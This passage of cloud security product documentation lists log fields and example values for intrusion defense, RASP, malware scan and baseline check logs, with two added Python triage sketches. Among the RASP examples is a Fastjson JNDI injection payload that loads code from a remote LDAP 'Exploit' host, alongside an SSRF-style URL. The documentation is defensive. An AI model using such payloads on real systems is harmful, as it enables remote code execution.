| instance_sub_type | The instance subtype. Values depend on instance_type. For ECS: INSTANCE, DISK, SECURITY_GROUP. For ACR: REPOSITORY_ENTERPRISE, REPOSITORY_PERSON. For RAM: ALIAS, USER, POLICY, GROUP. For WAF: DOMAIN. For other types: INSTANCE. | INSTANCE |
| instance_type | The instance type. Values: ECS (Elastic Compute Service); SLB (Server Load Balancer); RDS (ApsaraDB RDS); MONGODB (ApsaraDB for MongoDB); KVSTORE (ApsaraDB for Redis); ACR (Container Registry); CSK; VPC (Virtual Private Cloud); ACTIONTRAIL (ActionTrail); CDN (Content Delivery Network); CAS (Certificate Management Service); RDC (Apsara DevOps); RAM (Resource Access Management); DDoS (Anti-DDoS); WAF (Web Application Firewall); OSS (Object Storage Service); PolarDB (PolarDB); POSTGRESQL (ApsaraDB RDS for PostgreSQL); MSE (Microservices Engine); NAS (File Storage NAS); SDDP (Sensitive Data Discovery and Protection); EIP (Elastic IP Address). | ECS |
| region_id | The region ID where the instance resides. | cn-hangzhou |
| requirement_id | The requirement ID. You can obtain this ID by calling the ListCheckStandard operation. | 5 |
| risk_level | The risk level. Values: LOW; MEDIUM; HIGH. | MEDIUM |
| section_id | The section ID. You can obtain this ID by calling the ListCheckResult operation. | 1 |
| standard_id | The standard ID. You can obtain this ID by calling the ListCheckStandard operation. | 1 |
| status | The check item status. Values: NOT_CHECK (Not checked); CHECKING (Checking); PASS (Passed); NOT_PASS (Failed); WHITELIST (Whitelisted). | PASS |
| vendor | The cloud service provider. Fixed value: ALIYUN. | ALIYUN |
| start_time | The start timestamp, in seconds. Also used to indicate the time when the event occurred. | 1719472214 |

Network defense logs

Field

Description

Example

cmd

The command line of the attacked process.

nginx: master process nginx

cur_time

The time the attack event occurred.

2023-09-14 09:21:59

decode_payload

The payload converted from HEX to characters.

POST /Services/FileService/UserFiles/

dst_ip

The IP address of the attacked asset.

172.16.XX.XX

dst_port

The port of the attacked asset.

80

func

The type of the intercepted event. Values: payload (malicious payload interception, triggered by detecting malicious data or commands); tuple (malicious IP interception, triggered by detecting malicious IP access).

payload

rule_type

The specific rule type of the intercepted event. Values: alinet_payload (payload event defense rule defined by Security Center); alinet_tuple (tuple event defense rule defined by Security Center).

alinet_payload

instance_id

The instance ID of the attacked asset.

i-2zeg4zldn8zypsfg****

internet_ip

The public IP address of the attacked asset.

39.104.XX.XX

intranet_ip

The private IP address of the attacked asset.

192.168.XX.XX

final_action

The defense action. Fixed value: block (Blocked).

block

payload

The payload in HEX format.

504f5354202f20485454502f312e310d0a436f6e74656e742d547970653a20746578742f706c61696e0d0a557365722d4167656e743a20****

pid

The ID of the attacked process.

7107

platform

The system type of the attacked asset. Values: windows; linux.

linux

proc_path

The path of the attacked process.

/usr/sbin/nginx

sas_group_name

The asset group of the server in Security Center.

default

src_ip

The source IP address of the attack.

106.11.XX.XX

src_port

The source port of the attack.

29575

uuid

The UUID of the server.

5d83b26b-b7ca-4a0a-9267-12****

start_time

The start timestamp, in seconds. Also used to indicate the time when the event occurred.

1719472214
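
The following is an added example, not part of the original page or of Security Center itself: a Python sketch that turns one network defense record into a triage view by decoding the HEX `payload` field and converting `start_time`. The sample record, its IP addresses and the helper names `decode_hex_payload` and `normalize` are assumptions made for illustration.

```python
import re
from datetime import datetime, timezone

# Constructed record using field names from the network defense table.
# IPs are documentation-range addresses; the payload is constructed and complete.
SAMPLE = {
    "func": "payload",
    "final_action": "block",
    "src_ip": "198.51.100.7",
    "src_port": "29575",
    "dst_ip": "172.16.0.10",
    "dst_port": "80",
    "proc_path": "/usr/sbin/nginx",
    "payload": b"POST /upload HTTP/1.1\r\nHost: example.test\r\n\r\n".hex(),
    "start_time": "1719472214",
}


def decode_hex_payload(hex_text):
    """Decode the HEX `payload` field. Returns (text, complete).

    `complete` is False when the value is masked, truncated or has a
    dangling half byte, so callers know the text is only a prefix.
    """
    stripped = (hex_text or "").strip()
    digits = re.match(r"[0-9a-fA-F]*", stripped).group(0)
    complete = digits == stripped and len(digits) % 2 == 0
    if len(digits) % 2:
        digits = digits[:-1]  # drop the dangling half byte
    raw = bytes.fromhex(digits)
    # Keep printable ASCII and CR/LF; show every other byte as '.' so the
    # result is safe to print in a terminal or ticket.
    text = "".join(chr(b) if 32 <= b < 127 or b in (10, 13) else "." for b in raw)
    return text, complete


def normalize(record):
    """Flatten one network defense record into a triage-friendly dict."""
    text, complete = decode_hex_payload(record.get("payload"))
    lines = text.splitlines()
    when = datetime.fromtimestamp(int(record["start_time"]), tz=timezone.utc)
    return {
        "when_utc": when.isoformat(),
        "kind": record.get("func", ""),  # payload or tuple
        "flow": "{src_ip}:{src_port} -> {dst_ip}:{dst_port}".format(**record),
        "target_process": record.get("proc_path", ""),
        "first_line": lines[0] if lines else "",
        "payload_complete": complete,
    }


if __name__ == "__main__":
    for key, value in normalize(SAMPLE).items():
        print(f"{key}: {value}")
```

A value that ends in a mask, such as the `payload` example in the table, decodes to a prefix only and is reported with `payload_complete` set to False.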

Application protection logs

Field

Description

Example

app_dir

The directory where the application resides.

/usr/local/aegis/rasp/apps/1111

app_id

The application ID.

6492a391fc9b4e2aad94****

app_name

The application name.

test

confidence_level

The detection algorithm confidence level. Values: high; medium; low.

low

request_body

The request body.

{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://172.220.XX.XX:1389/Exploit","autoCommit":true}

request_content_length

The length of the request body.

112

data

The hook point parameters.

{"cmd":"bash -c kill -0 -- -'31098' "}

headers

The request headers.

{"content-length":"112","referer":"http://120.26.XX.XX:8080/demo/Serial",...}

hostname

The name of the host or network device.

testhostname

host_ip

The private IP address of the host.

172.16.XX.XX

is_cliped

Indicates whether the log was truncated due to exceeding the length limit. Values: true (truncated); false (not truncated).

false

jdk_version

The JDK version.

1.8.0_292

message

The alert description.

Unsafe class serial.

request_method

The HTTP request method.

Post

platform

The operating system type.

Linux

arch

The operating system architecture.

amd64

kernel_version

The operating system kernel version.

3.10.0-1160.59.1.el7.x86_64

param

The request parameters. Common formats include GET parameters and application/x-www-form-urlencoded.

{"url":["http://127.0.0.1.xip.io"]}

payload

The effective attack payload.

bash -c kill -0 -- -'31098'

payload_length

The length of the attack payload.

27

rasp_id

The unique ID of the RASP probe.

fa00223c8420e256c0c98ca0bd0d****

rasp_version

The RASP probe version.

0.8.5

src_ip

The IP address of the requester.

172.0.XX.XX

final_action

The alert handling result. Values: block (Blocked); monitor (Monitoring).

block

rule_action

The alert handling method specified by the rule. Values: block; monitor.

block

risk_level

The risk level. Values: high; medium; low.

high

stacktrace

The stack trace.

[java.io.FileInputStream.<init>(FileInputStream.java:123), ...]

time

The time the alert was triggered.

2023-10-09 15:19:15

timestamp

The timestamp when the alert was triggered, in milliseconds.

1696835955070

type

The attack type. Values: attach (malicious attach); beans (malicious beans binding); classloader (malicious class loading); dangerous_protocol (dangerous protocol use); dns (malicious DNS query); engine (engine injection); expression (expression injection); file (malicious file read/write); file_delete (arbitrary file deletion); file_list (directory traversal); file_read (arbitrary file read); file_upload (malicious file upload); jndi (JNDI injection); jni (JNI injection); jstl (JSTL arbitrary file inclusion); memory_shell (in-memory webshell injection); rce (remote code execution); read_object (deserialization attack); reflect (malicious reflection); sql (SQL injection); ssrf (malicious outbound connection); thread_inject (thread injection); xxe (XXE attack).

rce

url

The request URL.

http://127.0.0.1:999/xxx

rasp_attack_uuid

The UUID of the attack event.

18823b23-7ad4-47c0-b5ac-e5f036a2****

uuid

The host UUID.

23f7ca61-e271-4a8e-bf5f-165596a16****

internet_ip

The public IP address of the host.

1.2.XX.XX

intranet_ip

The private IP address of the host.

172.16.XX.XX

sas_group_name

The Security Center server group name.

Group 1

instance_id

The host instance ID.

i-wz995eivg28f1m**

start_time

The start timestamp, in seconds. Also used to indicate the time when the event occurred.

1719472214

Malicious file detection logs

Field

Description

Example

bucket_name

The OSS bucket name.

***-test

event_id

The alert ID.

802210

event_name

The alert name.

Mining program

md5

The MD5 hash of the file.

6bc2bc******53d409b1

sha256

The SHA256 hash of the file.

f038f9525******7772981e87f85

result

The detection result. Values: 0 (File is safe); 1 (Malicious file detected).

0

file_path

The file path.

test.zip/bin_test

etag

The OSS file identifier.

6BC2B******853D409B1

risk_level

The risk level. Values: serious (Urgent); suspicious (Suspicious); remind (Reminder).

remind

source

The detection scenario. Values: OSS (file detection in an OSS bucket via the Security Center console); API (malicious file detection via the Java or Python SDK).

OSS

parent_md5

The MD5 hash of the parent file or archive file.

3d0f8045bb9******

parent_sha256

The SHA256 hash of the parent file or archive file.

69b643d6******a3fb859fa

parent_file_path

The name of the parent file or archive file.

test.zip

start_time

The start timestamp, in seconds. Also used to indicate the time when the event occurred.

1719472214

compress_file_number

The subfile sequence number in an archive, in the format [current]/[total]. For example, 1/10 means this is file 1 of 10 in the archive.

1/10
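
The following is an added example, not part of the original page or of Security Center itself: a Python sketch that rolls malicious file detection records up to their parent archive using `parent_sha256`, `compress_file_number`, `result` and `risk_level`. It assumes one record is logged per scanned subfile; the sample records, hash values and the helper names `parse_member_index` and `summarize_archives` are constructed for illustration.

```python
from collections import defaultdict

# Ordering of the risk_level values listed in the table above.
RISK_ORDER = {"remind": 1, "suspicious": 2, "serious": 3}

P1, P2 = "a" * 64, "b" * 64  # constructed parent_sha256 values

# Constructed records: one fully scanned archive, one partially scanned
# archive, and one standalone file with no parent fields.
RECORDS = [
    {"parent_sha256": P1, "parent_file_path": "test.zip", "file_path": "test.zip/readme",
     "compress_file_number": "1/3", "result": "0"},
    {"parent_sha256": P1, "parent_file_path": "test.zip", "file_path": "test.zip/bin_test",
     "compress_file_number": "2/3", "result": "1", "risk_level": "suspicious"},
    {"parent_sha256": P1, "parent_file_path": "test.zip", "file_path": "test.zip/agent",
     "compress_file_number": "3/3", "result": "1", "risk_level": "serious"},
    {"parent_sha256": P2, "parent_file_path": "logs.tar", "file_path": "logs.tar/a.log",
     "compress_file_number": "1/2", "result": "0"},
    {"file_path": "single.bin", "result": "0"},
]


def parse_member_index(value):
    """'1/10' -> (1, 10); None for missing or malformed values."""
    try:
        current, total = (int(part) for part in value.split("/"))
    except (AttributeError, ValueError):
        return None
    return (current, total) if 1 <= current <= total else None


def summarize_archives(records):
    """Group subfile records by parent archive and report the worst finding."""
    archives = defaultdict(
        lambda: {"name": "", "total": None, "seen": set(), "malicious": [], "worst": None}
    )
    for rec in records:
        parent = rec.get("parent_sha256")
        if not parent:
            continue  # standalone file, not an archive member
        entry = archives[parent]
        entry["name"] = rec.get("parent_file_path", "")
        index = parse_member_index(rec.get("compress_file_number"))
        if index:
            entry["seen"].add(index[0])
            entry["total"] = index[1]
        if str(rec.get("result")) == "1":  # 1 = malicious file detected
            entry["malicious"].append(rec.get("file_path", ""))
            level = rec.get("risk_level")
            if RISK_ORDER.get(level, 0) > RISK_ORDER.get(entry["worst"], 0):
                entry["worst"] = level
    return {
        parent: {
            "name": e["name"],
            "malicious": sorted(e["malicious"]),
            "worst": e["worst"],
            # True only when every subfile number 1..total was seen.
            "complete": e["total"] is not None and len(e["seen"]) == e["total"],
        }
        for parent, e in archives.items()
    }
```

An archive with `complete` set to False has subfiles with no record yet, so a clean summary for it should not be read as a clean archive.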

Core file monitoring event logs

Field

Description

Example

start_time

The latest occurrence time of the event, in seconds.

1718678414

uuid

The UUID of the client.

5d83b26b-b**a-4**a-9267-12****

file_path

The file path.

/etc/passwd

proc_path

The process path.

/usr/bin/bash

rule_id

The ID of the matched rule.

123

rule_name

The rule name.

file_test_rule

cmdline

The command line.

bash /opt/a

operation

The operation performed on the file.

READ

risk_level

The alert level.

2

pid

The process ID.

45324

proc_permission

The process permissions.

rwxrwxrwx

instance_id

The instance ID.

i-wz995eivg2****

internet_ip

The public IP address.

192.0.2.1

intranet_ip

The private IP address.

172.16.0.1

instance_name

The instance name.

aegis-test

platform

The operating system type.

Linux

Agentless detection logs

Common fields

Field

Description

Example

uuid

The UUID of the server.

ad66133a-dc82-4e5e-9659-a49e3****

instance_id

The instance ID.

i-2zeg4zldn8zypsfg****

internet_ip

The public IP address of the asset.

39.104.XX.XX

intranet_ip

The private IP address of the asset.

192.168.XX.XX

sas_group_name

The asset group of the server in Security Center.

default

start_time

The start timestamp, in seconds. Also used to indicate the time when the event occurred.

1719472214

Vulnerability risk fields

Field

Description

Example

vul_name

The vulnerability name.

imgsca:java:gson:AVD-2022-25647

vul_alias_name

The vulnerability alias.

gson code issue vulnerability (CVE-2022-25647)

vul_primary_id

The primary key ID of the vulnerability.

990174361

type

The vulnerability type. Values: sys (Windows system vulnerability); cve (Linux software vulnerability); sca (application vulnerability, software component analysis type); emg (urgent vulnerability).

sca

alert_level

The vulnerability risk level. Values: asap (High); later (Medium); nntf (Low).

asap

instance_name

The hostname.

hhht-linux-***

operation

The action performed on the vulnerability. Values: new (New); update (Updated).

new

status

The vulnerability status. Values: 1 (Unfixed); 7 (Fixed).

1

tag

The vulnerability tag. Values: oval (Linux software vulnerability); system (Windows system vulnerability). Tags for other vulnerability types are random strings.

oval

Baseline check fields

Field

Description

Example

check_item_name

The name of the check item.

Set password expiration time

check_item_level

The check item risk level. Values: high (High); medium (Medium); low (Low).

high

check_type

The type of the check item.

Identity authentication

risk_level

The risk level. Values: high (High); medium (Medium); low (Low).

low

operation

The action. Values: new (New); update (Updated).

new

risk_name

The name of the risk item.

Password policy compliance check

status

The check item status. Values: 1 (Failed); 3 (Passed).

1

sub_type_alias_name

The alias of the subtype.

Alibaba Cloud standard - CentOS Linux 7/8 security baseline

sub_type_name

The baseline subtype name. For valid values, see the List of baseline types and subtypes.

hc_centos7

type_name

The baseline type name.

hc_best_secruity

type_alias_name

The alias of the type.

Best security practices

container_id

The container ID.

b564567427272d46f9b1cc4ade06a85fdf55075c06fdb870818d5925fa86****

container_name

The container name.

k8s_gamify-answer-bol_gamify-answer-bol-5-6876d5dc78-vf6rb_study-gamify-answer-bol_483a1ed1-28b7-11eb-bc35-00163e01****_0

Malicious sample fields

Field

Description

Example

alert_level

The risk level. Values: serious (Urgent); suspicious (Suspicious); remind (Reminder).

suspicious

alert_name

The name of the malicious sample alert.

Suspicious Process-SSH-based

operation

The action. Values: new (New); update (Updated).

new

status

The malicious sample risk status. Values: 0 (Unhandled); 3 (Whitelisted).

0

suspicious_event_id

The alert event ID.

909361

Sensitive file fields

Field

Description

Example

alert_level

The risk level. Values: high (High); medium (Medium); low (Low).

high

rule_name

The file type name.

Ionic token

file_path

The path of the sensitive file.

/Windows/Microsoft.NET/assembly/GAC_MSIL/System.WorkflowServices/v4.0_4.0.0.0__31bf3856ad36****/System.WorkflowServices.dll

result

The check result.

{"result":"[\"[\\\"mysql-uqjtwadmin-xxx"}

Appendix

List of baseline types and subtypes

Type name

Subtype name

Description

hc_exploit

hc_exploit_redis

High-risk threat exploit: Unauthorized access to Redis

hc_exploit_activemq

High-risk threat exploit: Unauthorized access to ActiveMQ

hc_exploit_couchdb

High-risk threat exploit: Unauthorized access to CouchDB

hc_exploit_docker

High-risk threat exploit: Unauthorized access to Docker

hc_exploit_es

High-risk threat exploit: Unauthorized access to Elasticsearch

hc_exploit_hadoop

High-risk threat exploit: Unauthorized access to Hadoop

hc_exploit_jboss

High-risk threat exploit: Unauthorized access to JBoss

hc_exploit_jenkins

High-risk threat exploit: Unauthorized access to Jenkins

hc_exploit_k8s_api

High-risk threat exploit: Unauthorized access to Kubernetes API server

hc_exploit_ldap

High-risk threat exploit: Unauthorized access to LDAP (Windows)

hc_exploit_ldap_linux

High-risk threat exploit: Unauthorized access to OpenLDAP (Linux)

hc_exploit_memcache

High-risk threat exploit: Unauthorized access to Memcached

hc_exploit_mongo

High-risk threat exploit: Unauthorized access to MongoDB

hc_exploit_pgsql

High-risk threat exploit: Unauthorized access to PostgreSQL baseline

hc_exploit_rabbitmq

High-risk threat exploit: Unauthorized access to RabbitMQ

hc_exploit_rsync

High-risk threat exploit: Unauthorized access to rsync

hc_exploit_tomcat

High-risk threat exploit: Apache Tomcat AJP file inclusion vulnerability

hc_exploit_zookeeper

High-risk threat exploit: Unauthorized access to ZooKeeper

hc_container

hc_docker

Alibaba Cloud standard: Docker security baseline check

hc_middleware_ack_master

International security best practices: Kubernetes (ACK) master node security baseline check

hc_middleware_ack_node

International security best practices: Kubernetes (ACK) node security baseline check

hc_middleware_k8s

Alibaba Cloud standard: Kubernetes master security baseline check

hc_middleware_k8s_node

Alibaba Cloud standard: Kubernetes node security baseline check

cis

hc_suse15_djbh

MLPS Level 3: SUSE 15 compliance baseline check

hc_aliyun_linux3_djbh_l3

MLPS Level 3: Alibaba Cloud Linux 3 compliance baseline check

hc_aliyun_linux_djbh_l3

MLPS Level 3: Alibaba Cloud Linux/Aliyun Linux 2 compliance baseline check

hc_bind_djbh

MLPS Level 3: Bind compliance baseline check

hc_centos6_djbh_l3

MLPS Level 3: CentOS Linux 6 compliance baseline check

hc_centos7_djbh_l3

MLPS Level 3: CentOS Linux 7 compliance baseline check

hc_centos8_djbh_l3

MLPS Level 3: CentOS Linux 8 compliance baseline check

hc_debian_djbh_l3

MLPS Level 3: Debian Linux 8/9/10 compliance baseline check

hc_iis_djbh

MLPS Level 3: IIS compliance baseline check

hc_informix_djbh

MLPS Level 3: Informix compliance baseline check

hc_jboss_djbh

MLPS Level 3: JBoss compliance baseline check

hc_mongo_djbh

MLPS Level 3: MongoDB compliance baseline check

hc_mssql_djbh

MLPS Level 3: SQL Server compliance baseline check

hc_mysql_djbh

MLPS Level 3: MySQL compliance baseline check

hc_nginx_djbh

MLPS Level 3: Nginx compliance baseline check

hc_oracle_djbh

MLPS Level 3: Oracle compliance baseline check

hc_pgsql_djbh

MLPS Level 3: PostgreSQL compliance baseline check

hc_redhat6_djbh_l3

MLPS Level 3: Red Hat Linux 6 compliance baseline check

hc_redhat_djbh_l3

MLPS Level 3: Red Hat Linux 7 compliance baseline check

hc_redis_djbh

MLPS Level 3: Redis compliance baseline check

hc_suse10_djbh_l3

MLPS Level 3: SUSE 10 compliance baseline check

hc_suse12_djbh_l3

MLPS Level 3: SUSE 12 compliance baseline check

hc_suse_djbh_l3

MLPS Level 3: SUSE 11 compliance baseline check

hc_ubuntu14_djbh_l3

MLPS Level 3: Ubuntu 14 compliance baseline check

hc_ubuntu_djbh_l3

MLPS Level 3: Ubuntu 16/18/20 compliance baseline check

hc_was_djbh

MLPS Level 3: WebSphere Application Server compliance baseline check

hc_weblogic_djbh

MLPS Level 3: WebLogic compliance baseline check

hc_win2008_djbh_l3

MLPS Level 3: Windows 2008 R2 compliance baseline check

hc_win2012_djbh_l3

MLPS Level 3: Windows 2012 R2 compliance baseline check

hc_win2016_djbh_l3

MLPS Level 3: Windows 2016/2019 compliance baseline check

hc_aliyun_linux_djbh_l2

MLPS Level 2: Alibaba Cloud Linux/Aliyun Linux 2 compliance baseline check

hc_centos6_djbh_l2

MLPS Level 2: CentOS Linux 6 compliance baseline check

hc_centos7_djbh_l2

MLPS Level 2: CentOS Linux 7 compliance baseline check

hc_debian_djbh_l2

MLPS Level 2: Debian Linux 8 compliance baseline check

hc_redhat7_djbh_l2

MLPS Level 2: Red Hat Linux 7 compliance baseline check

hc_ubuntu_djbh_l2

MLPS Level 2: Ubuntu 16/18 compliance baseline check

hc_win2008_djbh_l2

MLPS Level 2: Windows 2008 R2 compliance baseline check

hc_win2012_djbh_l2

MLPS Level 2: Windows 2012 R2 compliance baseline check

hc_win2016_djbh_l2

MLPS Level 2: Windows 2016/2019 compliance baseline check

hc_aliyun_linux_cis

International security best practices: Alibaba Cloud Linux/Aliyun Linux 2 security baseline check

hc_centos6_cis_rules

International security best practices: CentOS Linux 6 security baseline check

hc_centos7_cis_rules

International security best practices: CentOS Linux 7 security baseline check

hc_centos8_cis_rules

International security best practices: CentOS Linux 8 security baseline check

hc_debian8_cis_rules

International security best practices: Debian Linux 8 security baseline check

hc_ubuntu14_cis_rules

International security best practices: Ubuntu 14 security baseline check

hc_ubuntu16_cis_rules

International security best practices: Ubuntu 16/18/20 security baseline check

hc_win2008_cis_rules

International security best practices: Windows Server 2008 R2 security baseline check

hc_win2012_cis_rules

International security best practices: Windows Server 2012 R2 security baseline check

hc_win2016_cis_rules

International security best practices: Windows Server 2016/2019 security baseline check

hc_kylin_djbh_l3

MLPS Level 3: Kylin compliance baseline check

hc_uos_djbh_l3

MLPS Level 3: UOS compliance baseline check

hc_best_security

hc_aliyun_linux

Alibaba Cloud standard: Alibaba Cloud Linux/Aliyun Linux 2 security baseline check

hc_centos6

Alibaba Cloud standard: CentOS Linux 6 security baseline check

hc_centos7

Alibaba Cloud standard: CentOS Linux 7/8 security baseline check

hc_debian

Alibaba Cloud standard: Debian Linux 8/9/10 security baseline check

hc_redhat6

Alibaba Cloud standard: Red Hat Linux 6 security baseline check

hc_redhat7

Alibaba Cloud standard: Red Hat Linux 7/8 security baseline check

hc_ubuntu

Alibaba Cloud standard: Ubuntu security baseline check

hc_windows_2008

Alibaba Cloud standard: Windows 2008 R2 security baseline check

hc_windows_2012

Alibaba Cloud standard: Windows 2012 R2 security baseline check

hc_windows_2016

Alibaba Cloud standard: Windows 2016/2019 security baseline check

hc_db_mssql

Alibaba Cloud standard: SQL Server security baseline check

hc_memcached_ali

Alibaba Cloud standard: Memcached security baseline check

hc_mongodb

Alibaba Cloud standard: MongoDB 3.x security baseline check

hc_mysql_ali

Alibaba Cloud standard: MySQL security baseline check

hc_oracle

Alibaba Cloud standard: Oracle 11g security baseline check

hc_pgsql_ali

Alibaba Cloud standard: PostgreSQL security baseline check

hc_redis_ali

Alibaba Cloud standard: Redis security baseline check

hc_apache

Alibaba Cloud standard: Apache security baseline check

hc_iis_8

Alibaba Cloud standard: IIS 8 security baseline check

hc_nginx_linux

Alibaba Cloud standard: Nginx security baseline check

hc_suse15

Alibaba Cloud standard: SUSE Linux 15 security baseline check

tomcat7

Alibaba Cloud standard: Apache Tomcat security baseline check

weak_password

hc_mongodb_pwd

Weak password: MongoDB logon weak password detection (version 2.x)

hc_weakpwd_ftp_linux

Weak password: FTP logon weak password check

hc_weakpwd_linux_sys

Weak password: Linux system logon weak password check

hc_weakpwd_mongodb3

Weak password: MongoDB logon weak password detection

hc_weakpwd_mssql

Weak password: SQL Server database logon weak password check

hc_weakpwd_mysql_linux

Weak password: MySQL database logon weak password check

hc_weakpwd_mysql_win

Weak password: MySQL database logon weak password check (Windows)

hc_weakpwd_openldap

Weak password: OpenLDAP logon weak password check

hc_weakpwd_oracle

Weak password: Oracle logon weak password detection

hc_weakpwd_pgsql

Weak password: PostgreSQL database logon weak password check

hc_weakpwd_pptp

Weak password: pptpd service logon weak password check

hc_weakpwd_redis_linux

Weak password: Redis database logon weak password check

hc_weakpwd_rsync

Weak password: rsync service logon weak password check

hc_weakpwd_svn

Weak password: SVN service logon weak password check

hc_weakpwd_tomcat_linux

Weak password: Apache Tomcat console weak password check

hc_weakpwd_vnc

Weak password: VNC Server weak password check

hc_weakpwd_weblogic

Weak password: WebLogic 12c logon weak password detection

hc_weakpwd_win_sys

Weak password: Windows system logon weak password check